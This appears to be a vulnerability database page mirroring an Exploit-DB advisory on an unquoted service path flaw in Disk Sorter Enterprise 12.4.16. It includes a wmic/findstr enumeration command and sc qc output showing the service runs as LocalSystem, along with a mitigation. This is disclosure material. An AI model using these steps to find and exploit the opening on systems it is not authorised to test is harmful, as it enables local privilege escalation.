header-logo
Suggest Exploit
vendor:
Disk Sorter Enterprise
by:
boku
7.8
CVSS
HIGH
Unquoted Service Path
73
CWE
Product Name: Disk Sorter Enterprise
Affected Version From: 12.4.16
Affected Version To: 12.4.16
Patch Exists: NO
Related CWE: N/A
CPE: a:disksorter:disk_sorter_enterprise:12.4.16
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 (32-bit)
2020

Disk Sorter Enterprise 12.4.16 – ‘Disk Sorter Enterprise’ Unquoted Service Path

Disk Sorter Enterprise 12.4.16 is vulnerable to an unquoted service path vulnerability. This vulnerability allows an attacker to gain elevated privileges on the system by exploiting the service path. The service path is not properly quoted, allowing an attacker to inject malicious code into the service path. This can be exploited by an attacker to gain elevated privileges on the system.

Mitigation:

Ensure that all service paths are properly quoted and that all services are running with the least privileges necessary.
Source

Exploit-DB raw data:

Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksorter.com
Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe
Version: 12.4.16
Tested On: Windows 10 (32-bit)


C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """
Disk Sorter Enterprise                    C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe                            Auto

C:\Users\terran>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Sorter Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Navigation

Suggest Exploit

Services By CQR